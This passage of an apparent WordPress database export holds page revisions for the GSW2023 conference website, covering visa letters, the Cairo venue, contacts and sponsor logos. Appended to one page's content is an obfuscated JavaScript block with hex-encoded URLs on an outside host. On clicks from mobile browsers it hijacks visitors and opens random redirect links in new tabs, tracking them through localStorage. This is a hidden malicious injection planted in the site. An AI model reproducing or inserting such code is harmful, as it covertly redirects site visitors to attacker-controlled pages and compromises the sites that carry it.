width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:30:01','2023-08-30 17:30:01','',3066,'https://gsw2023.com/?p=5443',0,'revision','',0),
(5444,1,'2023-08-30 17:37:49','2023-08-30 17:37:49','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner 